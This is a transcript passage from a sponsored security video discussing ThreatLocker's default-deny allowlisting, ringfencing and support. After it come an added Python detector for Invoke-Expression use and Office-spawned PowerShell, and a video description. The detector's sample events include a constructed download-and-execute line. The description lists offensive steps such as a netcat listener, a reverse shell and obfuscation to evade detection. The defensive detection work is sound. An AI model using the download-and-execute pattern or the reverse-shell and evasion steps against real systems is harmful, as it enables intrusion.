Yeah, so effectively what we do... system, and someone's not programmatically going around trying to grab text, and there's no reason to allow it, to be honest. There's some things that we don't even learn anyway, so the likes of storage control policies, that's what Nick set up there, we don't learn them. What we learn is application control policies, so basically what needs to run on a user's machine. We create a list of rules fundamentally based off that, and as I said, after a week, 10 days typically, you know, you're in a fairly good position, or fairly close to the point where you should be able to secure. But we do it with customers on call, so it's not as if they have to set everything up themselves and figure out how to use everything; we very much hold their hand all the way through the process.

So guys, I'm always the slow one in the room. Explain to me how this works. So like, how are you doing this? Is there software installed on the local computer? I'm assuming that's true. And then how are you stopping all of these calls? So can you just give us some understanding of how it actually works?

So fundamentally, yes,
there's an agent installed on the machine, very low impact, you know, very low CPU use, very low memory use, typically, you know, 0 to 1% CPU and a couple hundred megs of RAM. The reason it can be so low impact is fundamentally it's just making binary decisions; it's making yes or no decisions based on things that try to happen. So as I mentioned earlier, we've got controls, fundamentally, is what we do. So we've got application control, so allowing certain things to run and then blocking everything else by default. All the stuff that Jacob has been frustrated with, or a lot of the stuff Jacob's been frustrated with here, has been ring fencing, which is just about controlling what an application can do. That which is on the screen at the moment is storage control, so basically blocking certain applications, or blocking all applications, from accessing certain storage locations, is another function. And obviously we've got network control as well, which Nick mentioned a moment ago, which is just controlling outbound and inbound network traffic, again all from the agent at the endpoint.

How does it do this, though? Because I mean, if it's just a piece of software, does it have access to the kernel, or how's it actually intercepting everything?

So fundamentally there's a couple of pieces to it. So we've got a service and a driver. The service is the bit that makes the decisions; the driver gives information to the service to make those decisions. So it basically says, you know, this thing is trying to run, and the service says allow it or deny it. Pretty straightforward really. Structurally and fundamentally, that's it. Obviously we've got a portal where we configure all these policies, to allow certain things, to deny others. We've got a learning period, as I mentioned, where we build all those policies out, in most cases automatically. So it's a really light lift in comparison with some other similar tools that employ allow listing, where you have to basically
figure out everything that's required. You don't need to do that with ThreatLocker; we'll figure out what normal behavior is. Yeah, so as long as you stay within those boundaries, fundamentally we're not even going to get in your way; you're not going to notice we're there. It's not like we're using, you know, AI or black magic or something trying to figure out if stuff is good or bad. We don't really need to do that, for the most part, although as I said we do have detection capabilities; they're just not the primary method of protection.

So the difference here is, rather than trying to discover if something's malicious, you're just blocking everything and only permitting certain things that you've already predetermined are good, right?

Correct: deny by default, permit by exception, fundamentally.

I just thought about something while you were talking. Have you guys ever even dabbled with the concept of using, like, maybe this is dumb and crazy, but have you dabbled with the thought of using this as an anti-cheat for video games?

We have not, no, sorry. Okay, I got a second. Maybe the nerds in the room have, but we have... you have?

I was just thinking about that, because so they have all these streamers and they're all cheating, like there's so many of them, they're cheating, it's ridiculous. So I used to do system checks, like I would hop on with some of those streamers and do system checks, and I'd have different PowerShell scripts and such to look for, you know, different programs, different whatever it was, look through the registry, because like some of the bigger ones, they all make registry entries, and it's so predictable, it's easy to find. But like, nobody would trust me to actively have stuff on their system to stop them from cheating. Like, that's actually kind of big, because it's ruining the whole community.

Yeah, it actually is. We are right now talking about partnering with these tournament organizers that run millions and
millions of tournaments to harden their machines so no one can cheat on the tournaments. Oh my God. Because you learn the game, everything that the game needs to run, and we block everything else, so if they're trying to run a script, wallhack, aimbot, ESP, nothing will pass.

So yes, I was just really thinking about that. You guys could do some work in the anti-cheat area.

We're on it, we're on it. That was my first week, my God, my first week here, that was like my big thought.

Okay, oh my, I love you guys so much, oh my God.

Feelings mutual, Jacob.

Oh my God, I'm so sorry, I just thought about that spur of the moment. Why? Teams do work together, man.

No, dude, it's great. I think someone like you doesn't get enough recognition, and it's great to see, you know, you guys working together on this. You could save online gaming. You could save online gaming, like it's ruined, everybody hates it. Like, all right, I'll cut that there. But we've got to talk. Recently CrowdStrike had this blue screen wonderful event, obviously very sarcastic comment. How is this different, and how is that not going to happen to my environment if I run this?

So, yes, the unfortunate event. There's a few different things, or a few things I suppose we do differently, to tools like CrowdStrike, not only CrowdStrike. First and foremost, because we are primarily a proactive, as I said, default deny solution, we don't require constant updates to the program. Basically it does what it does irrespective, for the most part, of the threat that's thrown at it. So we don't need to respond to individual threats, to individual known bad behaviors, because we're not depending on detecting those individual threats or known bad behaviors. So the software itself, the agent itself, updates very irregularly, or not regularly, if I could put it that way. Unlike something like CrowdStrike, which, because of the nature of detection, they have to push out updates that fundamentally change their driver, you know, upwards of
10 times a day, we typically wouldn't change our driver 10 times in a year. And obviously because of that we can be a lot more careful and slower and more considered in terms of rolling a new version of ThreatLocker out, a new version of the driver out. So again, it's not something that's going to be changing 10 times a day; it's more likely 10 times a year, and it's done very carefully and slowly and in stages. The other thing I should mention, by the way, is obviously our driver does, in the grand scheme of things, not very much. It gives information to the service, and then it performs actions. It's not doing too much outside of that, because most of our processing is done in the service. The service is not running in the kernel, so the service is not something that would potentially cause a machine... like, you know, if the service crashes, it recovers; if the driver crashes, it's blue screen town. So because most of the processing is on the service, it's very unlikely.

No, that's honestly huge actually, as far as, like, you know, everything's in scope and in ratio. So without having that many interactions, between 10 a day to 10 a year, and then never, of course, pushing on a Friday, ever.

Exactly.

What about zero days?

Same principle again: because we block everything, we don't need to block individual threats, generally speaking. I mean, the same principle applies to lots of stuff, remote code execution. I mean, I've seen, you'll probably remember this one, Jacob, remember PrintNightmare? I've seen PrintNightmare being exploited, or trying to be exploited, on a machine running ThreatLocker, and it's really interesting, because you see the print spooler create a DLL, the DLL tries to execute, execution gets blocked by ThreatLocker because of default deny, for the most part. And again, look, never say never, and nothing is ever 100% secure and guaranteed 100% secure, but for the most part we don't need to respond to individual zero days. For the most part, something is going to try and run which we will probably
block, or something is going to try to happen, like the LOLBins that Jacob mentioned being used, and hopefully we will control them.

So I'm just trying to think of the questions that the audience would have. Right, next question is operating systems: which operating systems are supported?

So basically Windows, Mac and Linux. Windows technically from Windows 7 onwards, and as well as that, it feels so weird to say this in 2024, we do have an XP agent that has just become available. But look, it's a sad fact that some customers do have, you know, OT machines basically running XP. Similarly various flavors of Linux, obviously, as well, so the Linux agent has just been released, or has only recently been released, but macOS as well, obviously, so the last three versions of macOS are supported too.

Nice. One of the biggest concerns, I think, for businesses, and you guys can tell me, you know, based on your experience working with many businesses, is if a secretary has a laptop or a computer, right, they only should be running a very limited number of apps, and I suppose that's where you're, you know, blocking everything by default: you're only going to allow that person to run Word and Excel and perhaps a few other applications. Did I understand that right?

Correct. I mean, realistically 98% of users do the same things with the same software every single day, you know what I mean? They use Office, they use browsers, they use video conferencing tools, Teams, Zoom, you know, maybe a line-of-business application or two, and the fact is, if that's all they're doing, then realistically we're not going to get in their way. You know, it's when they start downloading, you know, TeamViewer or some random coupon clipper from China, then absolutely we're going to step in and block that. But that's what most organizations will want. But obviously there's differences between your average user and, say, a developer or an IT admin or something like that, so it's about
learning... oh, something else that just got blocked, Dropbox. It's about learning what is required on each individual's machine, a human being making decisions about, hang on a second, well, AnyDesk shouldn't be allowed in this environment, so let's block that; okay, TeamViewer shouldn't be allowed in this environment, let's block that. I mean, the one thing that organizations will get if they deploy this is complete visibility over what's running on their machines, and that is basically step one in controlling what's on your machines: knowing what's there. And basically in every single instance that I've worked with a customer deploying this, there is always a surprise. There was always something on their machines that they had no idea was there, and immediately: go get that off, or turn that off right now. So it could be a remote access tool, it could be, you know, a WinRAR or 7-Zip, or it could be, you know, 15 random coupon clipping extensions, whatever the case may be. There's always surprises, but visibility is the first step in control.

Because that warning that just popped up was literally the perfect example while you were explaining. What just happened, because I just wiped this computer, and now, if you don't know what I think of Windows 10 on this one, but Dropbox came as a pre-install, and the very first C2 that I made public, two years, or it's been three years now, once I came public on this name, the very first C2 I dropped was a Dropbox C2, which comes standard with the system now. And they still determined, hey, we didn't agree that you should have that. And that was standard, that was just installed, that was a fresh install right there, and it came with it. So for someone like me, I already have a Dropbox C2 that's ready; I just got to get one single file in there and it's over. And you guys just blocked it live while talking about it. That was kind of cool. So I didn't mean to jump in on you, but that was cool. I mean
you must... dude, it's great, because I think we really need this. Something we discussed in our last interview: there's this huge problem where the big companies, big corporates, aren't engaging with the ethical hacking community, so it's fantastic to see, you know, this discussion, because it's really important that companies engage with the good guys like you, you know, who are trying the stuff but not trying to sell it on the dark web.

Look, we've got so much to learn. We've got so much to learn, and that's part of the reason why we're here.

Yeah, there's a big difference between the companies that are trying to do right and protect you and the ones that are just trying to check boxes so they're not liable if something happens. That makes a huge difference, because a lot of the exploits that I find, for example, the reason Microsoft didn't pay me out is because it didn't fit within the parameters of what they would call bounties, or there was no box to check if they implemented what I told them to, so they just decided it wasn't worth it. But like you just saw, with, like, the descriptions in the PowerShell modules being able to store malware in there, that's still just free.

I wanted to ask about phishing, because it's a huge problem. So if I'm a non-technical user and I get some phishing email, what's going to happen?

Fundamentally, you're going to be able to click on the link. Now one of our recently added components is what we call Cloud Detect. Cloud Detect is... again, fundamentally we've got a protection platform, which is everything we've mentioned so far; we've got detection, which is looking for anomalous behavior and responding to it, much like a traditional EDR; we've also added cloud detection to that detection product, which basically lets you pull in logs from Office 365 to again look for anomalous behavior. So the reality is it would probably be detected in that Cloud Detect product. Fundamentally, we can't stop
users from clicking on links they shouldn't click on. I mean, we're not an email security product per se. We will block things like, as I mentioned earlier on, the likes of Excel calling PowerShell, or, you know, Outlook calling PowerShell; we will control all of those interactions, but actual phishing links themselves we can't really follow or stop a user from following. And I mean, we do mitigate user stupidity to some extent, but there's only so much you can do.

But I mean, if the user tried to download something off that link, that would be absolutely...

No, 100%, that would be blocked straight away. I'm just talking about credential theft more than anything else. No, if they try to download anything, it'd get blocked, or if they try and use, you know, say run a PowerShell script or anything like that, obviously it's going to be, you know, controlled just the same as you saw with Jacob's tests.

Yeah, but you could restrict which websites people go to, right? So you could stop them going to certain... absolutely... the world, and I hate to use examples, but like, say I'm a US company and all the customers I work with are in the US, then you could just restrict them to the US? Is that correct?

That is a feature that is coming soon. I don't want to get too specific on it, so geolocation or geoblocking is a feature that's coming soon. Right now, I mean, obviously you can block particular locations, websites, you know, so if you want to block Mega, or Dropbox is another great example, because file sharing utilities are a really good way of exfiltrating data, and again, legitimate file sharing utilities all the better, because your AV or EDR is probably not going to kick off about it. So you can very easily set up policies to block access to dropbox.com or mega.nz or whatever other tools that you want.

Two more things real quick. One, when you're talking about all those different software for exfiltrating stuff, Dropbox etc., I've literally authored all of those. I have made PowerShell scripts to use every single one of
them one of the pages on my site literally goes through all of them one at a time I almost if it uses Powershell though it will will probably block all of them again not because of specific Network deny it's just because Powershell can't get out in the internet and also I did want to point out uh that David you had brought up about uh blocking websites from other countries uh we do also have the software Health Report where it isn't websites but it'll tell you what applications are running in your environment and where they're based out of so uh you can just see oh maybe I don't want you know software running from a certain country uh you can just go in that and then find what's running uh from each country you don't want it running from and then just you know remove that software so Nico you picking it up on the like the the Management console thing right um yes I um we have unified a and you can see all the traffic that's going in there another funny thing as well is that um while we're also um putting in Source control putting Network control I also put in some detect policies because um since I knew You' using Powershell in the worst case scenario if any of our applications ring fence weren't be to run um one thing I knew no matter how you tried to hide everything says it's Powershell you'd have to run it using invoke expression so I made a little policy that checked for the use of I ex or invoke expression so we have a alert for every single time that you've ran every every single time that you've ran your um your Sager on the computer I want to a you this because this is in the back of my mind is management of this it sounds like a lot of work or is that incorrect to say that so that's specifically speaking about Jacob's environment and setting up Jacob's environment so as I said we did sort of sprinkle a little extra security dust on that particular setup but for most organizations we have a set of what would be best described as one size fits most policies 
that most environments can basically run with comfortably you know with one or two addition maybe a line of business application or two so in most cases it is just a case of pushing the agent out learning what's there having the policies created automatically so there's no heavy lift um one of the other things um for anybody who has ever had any experience with allow listing Solutions in general they'll know that probably the biggest problem with allow listing aside from building those initial policies is the problem of what happens when software updates um and generally speaking what happens happens when software updates with most tools is it breaks because hash changes your allow listing tool goes look I know that file is called acrobat doxe but it doesn't match my hash so I'm going to block it from running and then you have to respond you have to get things added Etc so one of the sort of secret Source parts of throut locker is we have this concept of what are called built-in applications which is a database of over 4,000 common applications that we track and monitor and update when they update so if acrobat updates we're going to basically capture those files those hashes add them them to what are called our built-in definitions they get pushed down to any customer who's using them automatically so what that means is those customers don't need to worry about updates to software causing problems we're effectively taking that responsibility on for them so between those two things the automated learning at the beginning and also the um built-in applications for Mo in most cases it is just a case of push it out jump on a call with us a week later we'll show you everything that's been learned do you want to turn this off no do you want to turn that off no you know repeat that maybe once or twice maybe three times at most at and it's just an hour uh a call repeat that a couple of times at the end of which you'll be in a position where you can turn it on safe and 
secure and the knowledge that it ain't going to break things so it's not a heavy lift and I just say David and I have spoken to customers who have implemented similar Solutions and I know what a pain it can be I mean I spoke to one organization who have spent and this is not an exaggeration four years on a project four years on a project trying implemental L listing and they still haven't turned it on well sorry I tell a lie they turned it on once and it blw screened a bunch of machines and they turn it off really quickly but that's the kind of undertaking it used to be whereas we've got Solutions Engineers who working with you know customers of tens of thousands machines that they get secured in you know six seven eight calls another question I think a lot of people have is support you know it's great to have a product but what happens with things go wrong or I'm not sure what it do what kind of support do you guys have 247 365 uh and I know I'm biased but the best in the business by a distance um I've been on the other side I've been the IT guy dealing with a vendor and I know the pain of not getting good support and you know logging a ticket and somebody gets back to you days later going hey is this a problem um obviously the nature of what we do speed is important if somebody has a problem with something they need to get that problems fixed quickly so we have as I said 247 365 human beings answering calls or answering um chats not AI not Bots um and I think the average is somewhere between 20 and 30 seconds currently um so you will talk to a human being you will talk to a human being who will be able to help you and quickly so yeah support is the best in the business as far as I'm concerned and same applies to the solutions Engineers so the guys who actually help with the onboarding so they're literally the tech resource that you know helps a customer through every step of the process from configuring all the different modules what they should do what they 
shouldn't do best practices what they should look out for all that kind of stuff it's all free it's all included in license cost there's no implementation cost there's no extra charge for any of that it's all as I said included and again best in the business by a distance jacobe I've got to give you the last word man what are your thoughts I think it's really cool that someone is trying to do something outside of just checking the boxes like coming down to it at the end of the day um they're creating new boxes and finding new boxes that need to be checked and not just trying to uh maintain safety against liabilities I just think that's probably one of the biggest strengths that they have being able to step outside and look outside the box and acknowledge other variables that other people aren't even looking at and I must say from my side the reason that we did this video is because of that interview where you mentioned them and recommended them as being like the only company that was able to block your stuff and I pretty confident you know if they can block you then the world's going to be a much safer place so thanks to everyone who joined this call and you know thanks to everyone who's watching please put your comments below I'm hoping that we will see more with jacobe and threadlocker and you know you can come back for another like demo and hopefully they'll beat you jacobe but I mean as you said better sweet
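Two of the controls described in the conversation above, the detect policy that alerts on any use of IEX or Invoke-Expression and the block on Office applications such as Excel or Outlook calling PowerShell, can be expressed as simple rules run over endpoint telemetry. The block below is an added example written for this page; it is not ThreatLocker's code and nothing from the video. The event layout, hostnames, rule names and sample events are all constructed for the example, loosely modelled on PowerShell script block logging (Event ID 4104) and process-creation records.

```python
"""Toy detection rules: Invoke-Expression (IEX) usage in logged PowerShell script
blocks, and Office applications spawning a PowerShell host.  Added example; the
event format and every sample value below are constructed, not real telemetry."""
import re
from dataclasses import dataclass

# Constructed sample events.  "script_block" mimics what script block logging
# records; "process" mimics a process-creation record with its parent image.
SAMPLE_EVENTS = [
    {"type": "script_block", "host": "ws01",
     "text": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"type": "script_block", "host": "ws01",
     "text": "$r = Invoke-WebRequest 'http://api.example.invalid/x'; iex $r.Content"},
    {"type": "script_block", "host": "ws02",
     "text": "Invoke-Expression (Get-Content .\\deploy.ps1 -Raw)"},
    {"type": "script_block", "host": "ws02",
     "text": "Write-Host 'iexplore is deprecated'"},   # 'iex' inside a word: no alert
    {"type": "process", "host": "ws03", "parent": "EXCEL.EXE",
     "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden"},
    {"type": "process", "host": "ws03", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe"},
    {"type": "process", "host": "ws04", "parent": "OUTLOOK.EXE",
     "image": "pwsh.exe", "cmdline": "pwsh.exe -c whoami"},
]

# Invoke-Expression and its alias iex, matched as whole tokens.  PowerShell
# command names are case-insensitive, so IEX, Iex and iex are the same alias.
# The lookarounds stop 'iexplore' or 'Invoke-Expression-Wrapper' from matching.
IEX_PATTERN = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.IGNORECASE)

# Office parents that normally have no business launching a shell (assumed list).
OFFICE_PARENTS = {"excel.exe", "outlook.exe", "winword.exe", "powerpnt.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def check_script_block(event):
    """Alert when a logged script block invokes Invoke-Expression or iex."""
    if IEX_PATTERN.search(event["text"]):
        return Alert("iex_usage", event["host"], event["text"])
    return None


def check_process(event):
    """Alert when an Office application is the parent of a PowerShell host."""
    if (event["parent"].lower() in OFFICE_PARENTS
            and event["image"].lower() in POWERSHELL_HOSTS):
        return Alert("office_spawns_powershell", event["host"],
                     f'{event["parent"]} -> {event["cmdline"]}')
    return None


def evaluate(events):
    """Run every rule over a list of events and return the alerts raised, in order."""
    alerts = []
    for ev in events:
        alert = None
        if ev["type"] == "script_block":
            alert = check_script_block(ev)
        elif ev["type"] == "process":
            alert = check_process(ev)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

Running the block against the constructed events raises four alerts: two for IEX usage on ws01 and ws02, and two for Excel and Outlook spawning a PowerShell host. Matching on script block log content rather than on the script file as it sits on disk is the stronger choice here, because script block logging records what PowerShell actually executes, which is the point the speaker makes about the stager having to pass through Invoke-Expression regardless of how it was wrapped.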

Original Description

Big thanks to ThreatLocker for sponsoring this video. To start your free trial with ThreatLocker please use the following link: https://www.threatlocker.com/davidbombal

NOTE: Jakoby's video freezes from time to time because he had to use a backup Internet connection as a result of the hurricanes experienced in the USA over the past few weeks. Apologies for the frame freezing. Fortunately his audio and demos were not affected :)

// YouTube Video REFERENCE //
Mind Blowing. Reverse Shell Demo with DNS data bouncing exfiltration!: https://youtu.be/JFWnMMte3f0

// I am Jakoby's SOCIAL //
YouTube: https://www.youtube.com/c/IamJakoby
LinkedIn: https://www.linkedin.com/in/i-am-jakoby
X: https://x.com/i_am_jakoby
Instagram: https://www.instagram.com/i_am_jakoby/
GitHub: https://github.com/I-Am-Jakoby
TikTok: https://www.tiktok.com/@i_am_jakoby
Reddit: https://www.reddit.com/user/jakobyscream/?rdt=49010
Discord: https://discord.com/servers/i-am-jakoby-495265922135621632

// David's SOCIAL //
Discord: https://discord.com/invite/usKSyzb
X: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/@davidbombal

// MY STUFF //
https://www.amazon.com/shop/davidbombal

// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com

// MENU //
0:00 - Intro
00:53 - Polymorphic Reverse shell generator generator
02:34 - ThreatLocker's Ringfencing
05:06 - Jakoby vs machine without ThreatLocker demo
09:57 - Jakoby vs machine with ThreatLocker demo
22:22 - How ThreatLocker blocks attacks
25:37 - The power of Powershell
31:28 - LolBins demo
34:44 - How ThreatLocker works // Behavioural detection
41:10 - ThreatLocker wins
42:17 - Jakoby/ThreatLocker discussions
49:13 - How ThreatLocker protects
53:04 - The future of online-gaming ant

This video shows how to stop a PowerShell reverse shell using ThreatLocker and other tools, and discusses techniques and concepts related to cybersecurity and behavior-based detection. The speakers demonstrate how ring fencing and a zero trust model can be applied to prevent malware attacks.

Key Takeaways
  1. Run a netcat listener on the intermediary box
  2. Implement a reverse shell with a single command
  3. Obfuscate the reverse shell to evade detection
  4. Use a jump box between themselves and the target system
  5. Keep segregation between the jump box and the API itself
  6. Use ThreatLocker to block Powershell connections to certain sites
ThreatLocker's behavior-based detection and ring fencing can effectively block reverse shell attacks without requiring configuration or tweaking.


Chapters (13)

0:00 Intro
0:53 Polymorphic Reverse shell generator generator
2:34 ThreatLocker's Ringfencing
5:06 Jakoby vs machine without ThreatLocker demo
9:57 Jakoby vs machine with ThreatLocker demo
22:22 How ThreatLocker blocks attacks
25:37 The power of Powershell
31:28 LolBins demo
34:44 How ThreatLocker works // Behavioural detection
41:10 ThreatLocker wins
42:17 Jakoby/ThreatLocker discussions
49:13 How ThreatLocker protects
53:04 The future of online-gaming ant